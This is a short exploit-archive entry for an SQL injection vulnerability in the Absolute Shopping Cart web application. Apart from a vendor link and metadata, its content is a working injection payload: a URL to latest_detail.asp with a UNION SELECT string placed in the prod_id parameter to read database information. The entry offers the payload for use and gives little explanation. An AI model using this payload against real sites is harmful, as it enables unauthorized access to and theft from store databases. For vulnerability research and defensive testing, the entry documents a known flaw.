id: 10356
date: 12/21/2009
title: Absolute Shopping Cart SQL Injection Vulnerability
author: Gamoscu
cves: 

==================================================
Absolute Shopping Cart SQL Injection Vulnerability
==================================================

#############################################################
# Absolute Shopping Cart SQL Injection Vulnerability
 
# Vendor: http://www.absoluteshoppingcart.co.uk/Category-195/Shopping-Cart-Demo
 
# Author: Gamoscu
##############################################################
 
 
 
  
# Exploit: http://server/latest_detail.asp?prod_id=SQL
     
           1+and+1=2+union+select+1,2,3,version(),5,6,7,8,9/*
          
  
##############################################################



#  0day.today [2023-03-22]  #